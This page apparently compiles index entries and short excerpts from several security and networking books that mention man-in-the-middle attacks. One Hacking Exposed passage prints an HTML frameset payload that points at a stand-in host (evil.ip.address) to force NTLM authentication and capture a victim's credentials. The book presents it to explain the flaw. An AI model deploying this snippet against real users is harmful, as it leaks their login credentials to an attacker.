(period), in search path .gpg suffix (binary encrypted files) .shosts file / (slash), beginning absolute directory names /dev directory /dev/null, redirecting standard input from /proc files filesystems networking, important files for (/proc/net/tcp and /proc/net/udp) /sbin/ifconfig /sbin/ifdown /sbin/ifup /tmp/ls (malicious program) /usr/share/ssl/cert.pem file /var/account/pacct /var/log/lastlog /var/log/messages /var/log/secure unauthorized sudo attempts, listing /var/log/utmp /var/log/wtmp : (colons), current directory in empty search path element @ character, redirecting log messages to another machine @otherhost syntax, syslog.conf ~/.ssh directory, creating and setting mode ~/.ssh/config file [ Team LiB ] [ Team LiB ] [SYMBOL] [A] [B] [C] [D] [E] [F] [G] [H] [I] [J] [K] [L] [M] [N] [O] [P] [Q] [R] [S] [T] [U] [V] [W] [X] absolute directory names access control lists (ACLs), creating with PAM access_times attribute (xinetd) accounting [See process accounting] acct RPM accton command (for process accounting) addpol command (Kerberos) administrative privileges, Kerberos user administrative system, Kerberos [See kadmin utility] agents, SSH [See also ssh-agent] forwarding, disabling for authorized keys terminating on logout using with Pine Aide (integrity checker) alerts, intrusion detection [See Snort] aliases for hostnames changing SSH client defaults for users and commands (with sudo) ALL keyword user administration of their own machines (not others) AllowUsers keyword (sshd) Andrew Filesystem kaserver ank command (adding new Kerberos principal) apache (/etc/init.d startup file) append-only directories apply keyword (PAM, listfile module) asymmetric encryption 2nd [See also public-key encryption] attacks anti-NIDS attacks buffer overflow detection with ngrep indications from system daemon messages dictionary attacks on terminals dsniff, using to simulate inactive accounts still enabled, using man-in-the-middle (MITM) risk with self-signed certificates services deployed with dummy keys operating system vulnerability to forged connections setuid root program hidden in filesystems on specific protocols system hacked via the network vulnerability to, factors in attributes (file), preserving in remote file copying authconfig utility imapd, use of general system authentication Kerberos option, turning on AUTHENTICATE command (IMAP) authentication cryptographic, for hosts for email sessions [See email IMAP] interactive, without password [See ssh-agent] Internet Protocol Security (IPSec) Kerberos [See Kerberos authentication] OpenSSH [See SSH] PAM (Pluggable Authentication Modules) [See PAM] SMTP [See SMTP] specifying alternate username for remote file copying SSH (Secure Shell) [See SSH] SSL (Secure Sockets Layer) [See SSL] by trusted host [See trusted-host authentication] authentication keys for Kerberos users and hosts authorization root user ksu (Kerberized su) command multiple root accounts privileges, dispensing running root login shell running X programs as SSH, use of 2nd sudo command sharing files using groups sharing root privileges via Kerberos via SSH sudo command allowing user authorization privileges per host bypassing password authentication forcing password authentication granting privileges to a group killing processes with logging remotely password changes read-only access to shared file restricting root privileges running any program in a directory running commands as another user starting/stopping daemons unauthorized attempts to invoke, listing weak controls in trusted-host authentication authorized_keys file (~/.ssh directory) forced commands, adding to authpriv facility (system messages) [ Team LiB ] [ Team LiB ] [SYMBOL] [A] [B] [C] [D] [E] [F] [G] [H] [I] [J] [K] [L] [M] [N] [O] [P] [Q] [R] [S] [T] [U] [V] [W] [X] backups, encrypting bash shell process substitution benefits of computer security, tradeoffs with risks and costs Berkeley database library, use by dsniff binary data encrypted files libpcap-format files searching for with ngrep -X option binary format (DER), certificates converting to PEM binary-format detached signature (GnuPG) bootable CD-ROM, creating securely broadcast packets btmp file, processing with Sys::Utmp module buffer overflow attacks detection with ngrep indicated by system daemon messages about names [ Team LiB ] [ Team LiB ] [SYMBOL] [A] [B] [C] [D] [E] [F] [G] [H] [I] [J] [K] [L] [M] [N] [O] [P] [Q] [R] [S] [T] [U] [V] [W] [X] C programs functions provided by system logger API writing to system log from 2nd CA (Certifying Authority) setting up your own for self-signed certificates SSL Certificate Signing Request (CSR), sending to Verisign, Thawte, and Equifax CA.pl (Perl script) cage, chroot (restricting a service to a particular directory) canonical hostname for SSH client finding with Perl script inconsistencies in capture filter expressions Ethereal, use of CERT Coordination Center (CERT/CC), incident reporting form cert.pem file adding new SSL certificate to validating SSL certificates in certificates generating self-signed X.509 certificate revocation certificates for keys distributing SSL converting from DER to PEM creating self-signed certificate decoding dummy certificates for imapd and pop3d generating Certificate Signing Request (CSR) installing new mutt mail client, use of setting up CA and issuing certificates validating verifying 2nd testing of pre-installed trusted certificates by Evolution Certifying Authority [See CA] certutil challenge password for certificates checksums (MD5), verifying for RPM-installed files chkconfig command enabling load commands for firewall KDC and kadmin servers, starting at boot process accounting packages, running at boot Snort, starting at boot chkrootkit program commands invoked by chmod (change mode) command 2nd preventing directory listings removing setuid or setgid bits setting sticky bit on world-writable directory world-writable files access, disabling chroot program, restricting services to particular directories CIAC (Computer Incident Advisory Capability), Network Monitoring Tools page Classless InterDomain Routing (CIDR) mask format client authentication [See Kerberos PAM SSH SSL trusted-host authentication] client programs, OpenSSH closelog function using in C program colons (:), referring to current working directory command-line arguments avoiding long prohibiting for command run via sudo Common Log Format (CLF) for URLs Common Name self-signed certificates compromised systems, analyzing Computer Emergency Response Team (CERT) Computer Incident Advisory Capability (CIAC) Network Monitoring Tools page computer security incident response team (CSIRT) copying files remotely name-of-source and name-of-destination rsync program, using scp program remote copying of multiple files CoronerÕs Toolkit (TCT) cps keyword (xinetd) Crack utility (Alec Muffet) cracking passwords CrackLib program, using 2nd John the Ripper software, using CRAM-MD5 authentication (SMTP) credentials, Kerberos forwardable listing with klist command obtaining and listing for users cron utility authenticating in jobs cron facility in system messages integrity checking at specific times or intervals restricting service access by time of day (with inetd) secure integrity checks, running crypt++ (Emacs package) cryptographic authentication for hosts Kerberos [See Kerberos authentication] plaintext keys using with forced command public-key authentication between OpenSSH client and SSH2 server, using OpenSSH key between OpenSSH client and SSH2 server, using SSH2 key between SSH2 client/OpenSSH server with ssh-agent SSH [See SSH] SSL [See SSL] by trusted hosts [See trusted-host authentication] cryptographic hardware csh shell, terminating SSH agent on logout CSR (Certificate Signing Request) passphrase for private key current directory colons (:) referring to Linux shell scripts in CyberTrust SafeKeyper (cryptographic hardware) [ Team LiB ] [ Team LiB ] [SYMBOL] [A] [B] [C] [D] [E] [F] [G] [H] [I] [J] [K] [L] [M] [N] [O] [P] [Q] [R] [S] [T] [U] [V] [W] [X] daemons IMAP, within xinetd imapd [See imapd] inetd [See inetd] Kerberized Telnet daemon, enabling mail, receiving mail without running POP, enabling within xinetd or inetd sendmail, security risks with visibility of Snort, running as sshd [See sshd] starting/stopping via sudo tcpd using with inetd using with xinetd Telnet, disabling standard xinetd [See xinetd] dangling network connections, avoiding date command DATE environment variable datestamps, handling by logwatch Debian Linux, debsums tool debugging debug facility, system messages Kerberized authentication on Telnet Kerberos authentication on POP Kerberos for SSH PAM modules SSL connection problems from server-side dedicated server, protecting with firewall denial-of-service (DOS) attacks preventing Snort detection of vulnerability to using REJECT DENY absorbing incoming packets (ipchains) with no response pings, preventing REJECT vs.


Service Design Patterns: Fundamental Design Solutions for SOAP/WSDL and RESTful Web Services by Robert Daigneau

Amazon Web Services, business intelligence, business logic, business process, continuous integration, create, read, update, delete, en.wikipedia.org, fault tolerance, loose coupling, machine readable, MITM: man-in-the-middle, MVC pattern, OSI model, pull request, RFC: Request For Comment, Ruby on Rails, software as a service, web application

Consider the case where client A and client B both retrieve data on customer C at the same time. Let’s say client A updates and saves this record, then client B does the same. If client A immediately reads the data on customer C again, it may appear as though their update was lost because they now see client B’s updates. Man-in-the-Middle Attack (MITM)—Occurs when a third party intercepts communications between a client and service. In the case of web services, the malicious party co-opts the TCP connection between the client and the server. The end result is that the client has a connection to the middleman, which also has a connection to the target service.

See also Response time Datasource Adapter, 140–141 definition, 285 Request Mapper, 113 web service API styles, 16 Layered systems, 46 Leveraging commodity caching technologies, 45 Linked Services adding/removing services, 79 address formatting, 79 benefits of, 78–79 breaking clients, avoiding, 79 description, 53 effects on web service evolution, 265 examples, 80–82 overview, 77–79 Response Mapper, 125–126 use for, 53 Web service calls, sequence of, 77 workflow guidance, 78–79 Linked Services, considerations hyperlinks, 80 security, 80 using with Resource APIs, 79–80 Load balancing, 5–6, 285–286 Local objects, 3–6 Location transparency, 22, 173–174 Loggers, intercepting, 201–303. See also Service Interceptor Long-running processes, 188. See also Workflow Connector Loose coupling, 9–10 Lost Update Problem, 49, 286 M Man-in-the-Middle Attack (MITM), 286 Mapper [POEAA], 272. See also Request Mapper; Response Mapper Marshal. See Serializing data Media preferences. See Media Type Negotiation Media Type Negotiation content negotiation, 71–73 description, 53 media type preferences, 70 overview, 70–73 Request Handler, selecting, 71–72 URIs, as file extensions, 70 use for, 53 Media Type Negotiation, considerations client-driven negotiations vs.

See Tolerant Reader delivery assurance, Idempotent Retry example, 217–219 structural changes to, 229–230 Messages, ESB canonical set, 222 converting to canonical form, 222–223 Guaranteed Delivery [EIP], 223–224 Message Stores [EIP], 223–224 Orchestration Engines, 224–225 routing, 222 workflow management, 224–225 Microformat, definition, 286 MIDL (Microsoft Interface Definition Library), 287 MIME (Multipurpose Internet Mail Extensions), 287. See also Media type MITM (Man-in-the-Middle Attack), 286 MOM (Message-Oriented Middleware), web service alternative, 8–9 MSMQ (Microsoft Message Queuing), 287 MTOM (Message Transmission Optimization Mechanism), 286 MVC pattern. See ASP.NET MVC N NAck (Negative Acknowledgment), 61 Naming DTOs, 99 Negotiating media preferences. See Media Type Negotiation Network efficiency, Service Descriptors, 177–178 Nondeterministic content models, 287 Normalizer [EIP], 273 I NDEX Notification.


pages: 889 words: 433,897

The Best of 2600: A Hacker Odyssey by Emmanuel Goldstein

affirmative action, Apple II, benefit corporation, call centre, disinformation, don't be evil, Firefox, game design, Hacker Ethic, hiring and firing, information retrieval, information security, John Markoff, John Perry Barlow, late fees, license plate recognition, Mitch Kapor, MITM: man-in-the-middle, Oklahoma City bombing, optical character recognition, OSI model, packet switching, pirate software, place-making, profit motive, QWERTY keyboard, RFID, Robert Hanssen: Double agent, rolodex, Ronald Reagan, satellite internet, Silicon Valley, Skype, spectrum auction, statistical model, Steve Jobs, Steve Wozniak, Steven Levy, Telecommunications Act of 1996, telemarketer, undersea cable, UUNET, Y2K

Anyhow, I hope this proves interesting for some of you wireless hackers out there. An Old Trick for a New Dog—WiFi and MITM (Winter, 2004-2005) by uberpenguin If you are reading this magazine, it is probably safe to assume you are familiar with the concept of a man-in-the-middle attack (which from here will be referred to as MITM for brevity) as it pertains to networking resources. In this article I hope to point out how this old and well known concept can be applied to an 802.11 WiFi network. I will use a case study of a fairly large wireless network I have access to in order to illustrate a possible scenario of a WiFi MITM attack. The Network First, let’s establish that gaining access to the network is not going to be discussed here.

(Ed Cummings), saga, 531–534 Clipper Chip, 556 against COCOTs, 458 defendants forced to accept plea agreement, 547–550 Digital Telephony Bill passes, 559–561 EFF, defined, 501–503 EFF, lawsuit against, 511 freedom of speech on Net, 538–540 fun ways to prosecute hackers, 555–556 hacker-bashing in Congress, 550–552 hackers and, 491–492 hackers in jail, 526–528 hackers vs. criminals, 553–554 hysteria dictating, 562 inspiring events, 557–559 Kevin Mitnick case, 528–530, 534–535 learning from hackers, 554–555 major crackdowns, 523–526 misunderstanding of new technology, 552–553 misunderstanding of technology, 562–565 negative feedback about hackers, 503–509 no more secrets, 535–538 Operation Sun Devil. see Operation Sun Devil poorly designed systems, 554 publicity facts and rumors, 509–510 punishments outweighing crimes, 544–546 Secret Service and 2600 . see Secret Service and 2600 meetings Steve Jackson wins lawsuit, 511 violence, vandals and victims, 566–569 lawsuits, 2000 and beyond, 573–599 DeCSS trial, 584–585, 587–589 freedom of speech, 594–596 H2K conference, 589–591 Kevin Mitnick, 586–587 litigation madness of, 580–584 MPAA lawsuit against 2600, 576–580 overview of, 573–575 positivity, 596–599 signs of hope, 591–594 what we are losing, 575–576 LCC EPROMs, 427 LCD displays electronic pay phones, 39–40 hacking soda machines, 721–722 New York MTA turnstiles, 789 LECs (Local Exchange Carriers) defined, 490 directory assistance idiocy, 655–657 incoming international collect fraud and, 480 revenue from access charges, 488–489 third-party billing fraud and, 478–479 LED signs, hacking, 325–327 Left Hand Side (LHS), RFC822 mail addresses, 153–155 Legion of Doom charges against, 495–496 overview of, 525 sentencing of three members of, 509–510 statement from, 497 Legions of the Underground (LoU), 260 Letter Sorting Machine (LSM), USPS, 374–375, 377 LFSRs (Linear Feedback Shift Registers), DeCSS code, 584–585 LG cell phones, 747–748 94192bindex.qxd 6/3/08 3:29 PM Page 853 Index LHS (Left Hand Side), RFC822 mail addresses, 153–155 Light Guide cabling, 53 Lightning, Knight (Craig Neidorf) bittersweet victory of, 501 EFF legally intervenes in case of, 502–503 facts and rumors, 509–510 indictment against, 494–495 views from a Fed, 384–385 line reversal, pay phones, 38 Linear Feedback Shift Registers (LFSRs), DeCSS code, 584–585 linear LNBs, 763 Link Access Protocol for D-channel, modified (LAPDm), GSM, 431 LinNeighborhood program, 742–743 linux-wlan-ng drivers, 739 listening devices. see surveillance devices LNB (Low Noise Block), satellite dishes, 762–763 Local Access Transport Area (LATA), 488–490 Local Exchange Carriers. see LECs (Local Exchange Carriers) local toll calling, 488 location area identifiers (LAIs), GSM phones, 431, 433 location updating, GSM phones, 433 lock picks, 777–780 locks, hacking. see Simplex locks LocusLink, 824 LOD. see Legion of Doom login hacking into VMS systems, 130 hacking University Applications Processing Center, 134–135 hacking voicemail, 472 RSTS/E, 127–128 logistics, lottery, 781 Long Distance Wholesale Club, 484 long-distance services 1986 suggestions for, 139–140 calling card fraud, 423–424 catching phone phreaks, 109–112 dark side of Ma Bell breakup, 71–73 divesture and, 82–85 equal access and, 93–97 hacker view on toll fraud, 219–220 hacking pay phones, 655 how companies work, 66–67 IBM audio distribution systems, 69–71 in-band signaling principles, 27–28 MCI, 67–69 microwave links, 67 multi-carrier toll abuse, 222–223 pay phone rates, 446–447 signaling system for, 27 successful teleconferencing, 76–82 Travelnet, 73–76 where charges come from, 487–490 long-range listening devices, surveillance, 350 loop extenders, 359 loops, Michigan, 12–13 lottery, hacking, 780–785 application, 783–784 conclusions, 784–785 logistics, 781 myths, 784 observing, 646–648 overview of, 780–781 procedure, 782–783 statistics, 781–782 LoU (Legions of the Underground), 260 Low Noise Block (LNB), satellite dishes, 762–763 LSM (Letter Sorting Machine), USPS, 374–375, 377 Luciferase gene, 822–824 Lyngsat Satellite Index, 765 M M15 emulation, 392 Ma Bell diverters, 60–62 divesture, 82–85 early phreak days, 44–45 friends in high places story, 55–56 getting into central office, 52–55 introducing competition to, 62–63, 68 operators, 47–48 overview, 44 small-time rural phone companies, 55–56 step offices, 49–52 surveying COSMOS, 59–60 switching centers, 45–46 teleconferencing story, 11–12 tragic side of breakup, 71–73 MAC addresses, 741, 743 MacNeil-Lehrer Report, 189 853 94192bindex.qxd 6/3/08 3:29 PM Page 854 854 Index MAEs (Metropolitan Area Ethernets), 304–305 mail systems ARPANET, 148 BITNET, 149 CSNet, 149 Mailnet, 149 MCI Mail, 159–161 networks sharing RFC822 electronic, 152–153 UUCP network, 149, 152 Mailnet, 149–151 mains powered transmitters, 354 malls, hackers in, 512–514 Manhattan Project, 5–7 man-in-the-middle attacks (MITMs), WiFi, 744–746 manuals, exploring cell phones, 425 MapQuest, 638 Marine law enforcement agencies, 620–623 marine telephone fraud, 423–424 Market Navigation, 81 MARK-facer canceler, USPS, 373–374, 376–377 marking methods, viruses, 291 Markoff, John lies of, 249–250, 252 as portrayed in The Fugitive Game, 246–247 stories about Kevin Mitnick, 529 Marshall, General, 4–5 MasterCard, 113 Masters of Deception (Quittner), 559 Masters of Deception (Slatalla and Quittner), 239–242 Master/Session key management, 709–710 Maxfield, John, 184 McAfee, John, 290–293 McAfee Associates, 292 McGruder, Aaron, 593 MCI (Microwave Communications Inc) 800-FRIENDS update service, 464 access code, 94 challenging Bell monopoly, 83 dishonest tactics of, 168–170 features of, 68–69 Friends and Family Circle gimmick, 463–464 long-distance fraud lawsuits of, 114 multi-carrier toll abuse and, 222–223 in nineties, 463–464 no method for finding codes, 68 overview of, 67–68 MCI Mail, 158–161, 170 MCI Worldcom backbone provider, 303 MCI.NET, 303 McKinney, Gene, 622 MD-5 cryptography, 312 media, in 1990s, 256–265 guiding perceptions about hackers, 256–258 hitting big time, 258–261 investigation and reporting, 261–265 mega-mergers, telephone, 482 Melissa virus, 581 MEM (MetroCard Express Machine), 785, 787–789 memory, in brain, 824–825 memory, increasing pager, 345 MEPS (Military Entry Processing Station), 628 Mercedes Benz, hacking, 772 MESSAGE CENTER voice mail, 473–474 Message Transfer Part (MTP) packets, 432 messages, pager. see pagers MetroCard Express Machine (MEM), 785, 787–789 MetroCard Vending Machine (MVM), 785, 787–789 MetroCards decoding Dual-Track - Track 1-2, 792–794 decoding Dual-Track - Track 3, 791–792 reading, 790 swiping on turnstile, 789 system of, 787–788 terminology, 785–786 Metrofone, 66–69 800 numbers, 92 Metropolitan Area Ethernets (MAEs), 304–305 Metropolitan Transportation Authority (MTA), 785 MF (multifrequency) tones blue boxes, 24 for cellular telephones, 105 history of blue boxing, 28–29 in-band signaling principles, 28 Michigan loops, 12–13 microphones coaxial cable, 352 contact, 350–351 hidden-wire line, 351 with in-line amplifier, 351 parabolic, 350 pizoelectric coaxial, 357 shotgun, 350 spike, 351 94192bindex.qxd 6/3/08 3:29 PM Page 855 Index telephone line, 352 tube, 351 Microsoft Outlook security weakness, 581 microwaves cellular telephones, 87 long-distance, 67 toll pass systems, 328 military consequences of hacking into, 301–302 experiences as paid hacker for, 405–408 Fortezza project, 310–312 military and war zone hacking stories, 618–630 backdoor exits from U.S.

Military, 627–628 circumventing DOD’s SmartFilter, 628–630 getting busted, 619–625 hacker goes to Iraq, 618–619 Military Entry Processing Station (MEPS), 628 Miller, Johnny Lee, 243–245 MILNET, 145–146 MIN (Mobile Identification Number) Cellemetry service, 436–437 cellular fraud and, 98, 479 NAM chip containing, 106 programming CMT, 107 roaming, 108 safe cellular phreaking using, 103 miniature tape recorders, 361–362 MINIX operating system, 392–396 Miramax, Takedown screenplay, 249–256 MISSI (Multilevel Information Systems Security Initiative), 310–312 MITMs (man-in-the-middle attacks), WiFi, 744–746 Mitnick, Kevin conditional freedom of, 564, 586–587 on doing time, 586 facts in, 523 false charges against, 528–529 forced to accept plea agreement, 538, 547–550 “Free Kevin” campaign, 252–253, 255–256 how this can happen, 544–546 imprisonment of, 526 indictment against, 531 media guiding perception of, 257–258 as portrayed in Cyberpunk , 235–238, 246 as portrayed in The Fugitive Game, 246–247 psychological and physical torture of, 569 punishment far outweighing crime, 534–535, 544–546 raid on, 202–203 as role model for overcoming adversity, 597 Takedown screenplay and, 249–252, 254–256 testifying before Senate about hackers, 580 what was lost, 575–576 MLOCR (Multiline Optical Character Reader), 375–377 Mobile Identification Number. see MIN (Mobile Identification Number) Mobile Station Integrated Services Digital Network (MSISDN) number, 429–430, 433–434 Mobile Station Roaming Number (MSRN), GSM, 433–434 Mobile Switching Center (MSC), GSM, 431–434 Mobile Telephone Switching Office. see MTSO (Mobile Telephone Switching Office) mobile telephones. see cellular phones Mobile Top Up phone card, Afghanistan, 659 MOD, 525, 527–528 Modern Biology, Inc., 822–823 modulation transmitters, advanced, 355 Monsanto’s Roundup Ready crops, 821 Morris, Robert T., 155–156, 235 Morse Code, 368–369 MOSAIC project, 310 Motion Picture Association of America. see MPAA (Motion Picture Association of America) Motorola, 363 motors, surveillance tape recorders, 361 MPAA (Motion Picture Association of America) DeCSS code and, 574 DeCSS trial verdict, 587–591 lawsuit against 2600 and others, 576–577 opposition to motions of, 583 people realizing true motives of, 591, 593 MSC (Mobile Switching Center), GSM, 431–434 MSISDN (Mobile Station Integrated Services Digital Network) number, 429–430, 433–434 MSRN (Mobile Station Roaming Number), GSM, 433–434 MTA (Metropolitan Transportation Authority), 785 MTP (Message Transfer Part) packets, 432 MTSO (Mobile Telephone Switching Office) checking valid cellular call number, 98 how cell phones work, 86 recognizing access codes, 106 roaming, 108 safe cellular phreaking and, 103 multi-carrier toll abuse, 222–223 855 94192bindex.qxd 6/3/08 3:29 PM Page 856 856 Index multifrequency tones. see MF (multifrequency) tones Multilevel Information Systems Security Initiative (MISSI), 310–312 multiline dial-out slave infinity device, 359 Multiline Optical Character Reader (MLOCR), 377 multiplexing, GSM phones, 431–432 multitrack recording, surveillance tape recorders, 362 muting mouthpiece, COCOTs, 452 MVM (MetroCard Vending Machine), 785, 787–789 MW/MHWMWNC (Wall Mount Enclosures), 608 Mykotronx, Inc., 312 N Nagra Magnetic Recorders, Inc., 362 NAM (Number Assignment Module) programming CMT, 107 safe cellular phreaking and, 103 security of, 106 named exchanges, 484–486 NAPs, system of, 304–305 Napster, 581–582 narrow band transmitters, 356 National Assembly of Hackers, 249 National Biometrics Test Center, 811 National Direct Dial (NDD) code, Afghan phone system, 658 National RNZ 36, 362 National Science Foundation Network (Nsfnet), 152 National Security Agency. see NSA (National Security Agency) National Semiconductor, Fortezza cards, 312 national signaling systems, 470–472 NATO allies, AUTOVON tied to, 31 Naval Intelligence, lobbying for Digital Telephony Bill, 561 Navy law enforcement agencies, 620–623 NCR ATMs, hacking, 765–768 NDD (National Direct Dial) code, Afghan phone system, 658 near infrared technology, vehicles, 329 Nedap voting machine, 807–808 Neidorf, Craig. see Lightning, Knight (Craig Neidorf) neighborhood security gates, 419–420 neighbors’ networks, hacking, 739–743 net, early days. see Internet, early days of Netcom, Kevin Mitnick case, 528–529 NetNorth, 152 NetStumbler, 734 network code, identifying GSM provider, 429 Network Processor. see NP (Network Processor) Network Solutions, 583 Network-Based ALI, 681–682 network-layer encryption, wireless networks, 737 networks beginning of Internet, 148–151 hacking paging, 345–349 Internet, 303 reading addresses, 153–155 Worldnet, 151–153 Neuromancer (Gibson), 235 New York City Transit Authority (NYCTA), 785 New York Telephone/NYNEX. see NYNEX/New York Telephone New York’s MTA, 785–794 conclusions, 794–795 Cubic Transportation Systems, 786–787 decoding Dual-Track MetroCards - Track 1-2, 792–794 decoding Dual-Track MetroCards - Track 3, 791–792 MetroCard system, 787–788 overview of, 785 reading MetroCards, 790 receipts, 788–789 terminology, 785–786 turnstiles, 789 vending machines, 788 newsgroups, elite speak in, 816 nmap, 742 non-beaconing, 737 non-judicial punishment, military law, 621 NON-PUBDA#, obtaining from CN/A operator, 48 no-pick option, and equal access, 97 Nortel DMS-MSC, GSM switch, 431 Northern Telecommunications, long-distance services made by, 67 Notepad, 638 Novatel CMTs, 104 NOVRAM chips, 427 NP (Network Processor) CampusWide infrastructure and, 608–609 94192bindex.qxd 6/3/08 3:29 PM Page 857 Index CampusWide server, 605 conducting simple transaction, 610–611 exploits, 611–612 getting into database through, 606 NPA (area code), pagers, 346 NSA (National Security Agency) Clipper Chip proposal, 556 cryptosystem of, 308 Digital Telephony Bill lobbying of, 561 Fortezza project, 310–312 invasion of citizen privacy, 552 secretive research of, 309–310 Nsfnet (National Science Foundation Network), 152 NTS Connection, MCI affiliation with, 169–170 Number Assignment Module. see NAM (Number Assignment Module) number restriction, COCOTs, 452 numbering system, world phone zones, 467–468 numbers 800, 92–93, 111–112 976 (dial-it) numbers, 62 Automatic Number Identifier, 61 determining hot sets of lottery, 646–648 ESN. see ESN (Electronic Serial Number) MIN. see MIN (Mobile Identification Number) NAM. see NAM (Number Assignment Module) numbers, COCOT phone call forwarding, 456–457 overview of, 453–454 numbers, stories about, 7–15 overview of, 7 scariest number in world, 8–9 teleconferencing saga, 11–15 truth about 9999, 9–11 Nunn, Senator Sam, 257 NYCTA (New York City Transit Authority), 785 NYCWireless group, 737–738 NYNEX/New York Telephone as Baby Bell, 83 changes to pay phones, 482–483 competing with Ma Bell, 62 exposing, 175–176 mega-mergers, 482 sleazy practices of, 157–158 O @o command, ARPANET, 146–147 OGM (outgoing message), answering machines, 660–662 OLD command, RSTS/E, 128 omnidirectional antennas, radio piracy, 760 OmniMetrix, 436 Omnipoint, 483 OneCard system. see CampusWide system op-diverting, ANI-fails, 665 OpenQubit, 288–289 Openwave, 747–749 Operation Sun Devil bittersweet victory, 501 crackdown, 493–496 hunt intensifies, 496–498 increased restrictions, 498–499 no time for complacency, 500–501 overview of, 492–493 operators Amateur Radio, 367–369 conferencing and, 81 enabling calls to special, 48–49 genesis of, 27 pagers sending out messages via, 341 types of, 47–48 Optim9000. see CampusWide system OptoComs, Chrome Box, 324–325 orangeboxing, 666 ORed (XORed) burst period, 432 Orinoco cards, 735 Orion, 436 OSUNY bulleting board, 23 outgoing message (OGM), answering machines, 660–662 out-of-band signaling, 27 overlay codes, 486 P Pacific Bell, wiretapping, 555 Pacific Telesis, 83 packet types, 802.11b, 734 pagefile.sys, 286 pagers, 339–345 decoding setup, 346–349 defined, 340 for free, 101–102 how messages are sent to, 340 how network works, 345–346 message length, 342 other questions, 342–345 sending out messages, 341 types of, 340 857 94192bindex.qxd 6/3/08 3:29 PM Page 858 858 Index PAI (public and international) accounts, Dell, 697, 699 Paketto Keiretsu, 701 PANI (Pseudo-ANI), 665 Pansat 2500A receivers, 763–764 paper clips, as lockpickers, 778 parabolic microphones, 350 ParadisePoker.com blackjack story, 644–646 parallel transmitters, 360 parasitic grids, 737–738 parole eligibility, military, 624–625 party lines, wiring for, 24 Passback Period, New York’s MTA, 786 passive detection, wireless networks, 734–735 passwords, 163 answering machine hacking, 660–662 Answers for Gateway, 730 COSMOS, 59 DEC-20, 124–125 electronic message center, 769 FirstClass, 617 IBM’s Audio Distribution System, 69–71 Internet radio stations, 306 MCI Mail, 160–161 military, 406–408 negative feedback on hacking, 503–504 printing password file, 60 Radio Shack screensaver, 706 RSTS/E, 127–128 Telemail, 122–124 UAPC, 135–136 VMS systems, 130 Watson system at T-Mobile stores, 676 patterns, lottery number, 784 pay phones, 35–43. see also COCOTs (Customer Owned Coin Operated Telephones) abuse of, 41–43 alternate designs, 38–40 charging for toll-free numbers from, 487 cheese box, 40–41 clear box working on post-pay, 32–33 hacking three holed, 652–655 history of, 36 in the nineties, 482–483 operation logic, 36–37 types of, 39 what happens to your money, 37–38 why redboxing doesn’t work, 446–448 pay TV descramblers, making, 332–333 PayPal, transaction reversals, 725–729 PBX (Private Branch eXchange) digital telephone abuse, 43 electronic pay phones, 39–40 multi-carrier toll abuse, 222–223 teleconferencing dangers, 79 teleconferencing using, 77 PCMCIA card, 310 PCP (PC Pursuit), 141–144, 164–165 PCS (Personal Communications Services), GSM, 428–429 PCs, Kmart, 715 peering, Internet, 302–305 pen registers, 183 Pengo, 235 Pentagon City Mall, 512 People Express, 166–168 Peripheral Interchange Program (PIP), RSTS/E, 128 peripheral nervous system, 826 Personal Communications Services (PCS), GSM, 428–429 personal identification code (PIC), Pronto, 164 Personal Identification Number (PIN), GSM SIM cards, 430 Personal Unblocking Key (PUK), 430 personalized info, XM Radio signal, 755 Pfaelzer, Mariana, 549 PHALSE (Phreakers, Hackers, and Laundromat Service Employees), 525 pharmacy computers, Wal-Mart, 714 phase-locked look (PLL) transmitter, radio piracy, 759–761 Phiber Optick case, 523, 526–527 philosophy. see hackers, philosophy phone cards, Afghan, 659 phone phreaking, 21st century, 659–680 ANI and Caller ID spoofing, 664–669 answering machine hacking, 659–662 backspoofing, 672–675 feeding the frenzy of Internet threats, 662–663 fun of prosecuting for, 555 getting more from T-Mobile, 675–679 tracking any U.K.


pages: 260 words: 40,943

Hacking Exposed: Network Security Secrets and Solutions by Stuart McClure, Joel Scambray, George Kurtz

AltaVista, bash_history, Dennis Ritchie, end-to-end encryption, information security, Ken Thompson, Larry Wall, MITM: man-in-the-middle, Morris worm, Multics, peer-to-peer, remote working, systems thinking, web application

Setting it to Send NTLMv2 Response Only or higher can greatly mitigate the risk from LM/NTLM eavesdropping attacks. (This assumes the continued restricted availability of programs that will extract hashes from NTLMv2 challenge-response traffic.) Rogue server and man-in-the-middle (MITM) attacks against NTLMv2 authentication are still feasible, assuming that the rogue/MITM server can negotiate the NTMv2 dialect with the server on behalf of the client. IRC HACKING Internet Relay Chat (IRC) remains one of the more popular applications on the Internet, driven not only by the instant gratification of real-time communications, but also by the ability to instantaneously exchange files using most modern IRC client software.

This also allows an attacker to craft an HTML email message that forces an outbound authentication over any port: <html> <frameset rows="100%,*"> P:\010Comp\Hacking\381-6\ch16.vp Monday, September 10, 2001 9:44:31 AM ProLib8 / Hacking Exposed: Network Security Color profile: Generic CMYK printer profile Composite Default screen Secrets and Solutions, Third Edition / McClure, Scambray & Kurtz / 9381-6 / Chapter 16 Chapter 16: Hacking the Internet User <frame src=about:blank> <frame src=telnet://evil.ip.address:port> </frameset> </html> Normally, this wouldn’t be such a big deal, except that on Win 2000, the built-in telnet client is set to use NTLM authentication by default. Thus, in response to the preceding HTML, a Win 2000 system will merrily attempt to log on to evil.ip.address using the standard NTLM challenge-response mechanism. This mechanism, as we saw in Chapter 5, can be vulnerable to eavesdropping and man-in-the-middle (MITM) attacks that reveal the victim’s username and password. This attack affects a multitude of HTML parsers and does not rely on any form of Active Scripting, JavaScript or otherwise. Thus, no IE configuration can prevent this behavior. Credit goes to DilDog of Back Orifice fame, who posted this exploit to Bugtraq.


pages: 360 words: 96,275

PostgreSQL 9 Admin Cookbook: Over 80 Recipes to Help You Run an Efficient PostgreSQL 9. 0 Database by Simon Riggs, Hannu Krosing

business intelligence, business process, database schema, Debian, en.wikipedia.org, full text search, GnuPG, MITM: man-in-the-middle, Skype

verify-ca Yes Depends on I want my data encrypted, and I accept the CA-policy overhead. I want to be sure that I connect to a server that I trust. 146 Chapter 6 SSL mode Eavesdropping protection MITM protection Statement verify-full Yes Yes I want my data encrypted, and I accept the overhead. I want to be sure that I connect to a server I trust, and that it's the one I specify. The MITM in the preceding table means Man-In-The-Middle attack, that is, someone posing as your server, but actually just observing and forwarding the traffic. Checking server authenticity The last two SSL modes allow you to be reasonably sure that you are actually talking to your server, by checking the SSL certificate presented by the server.

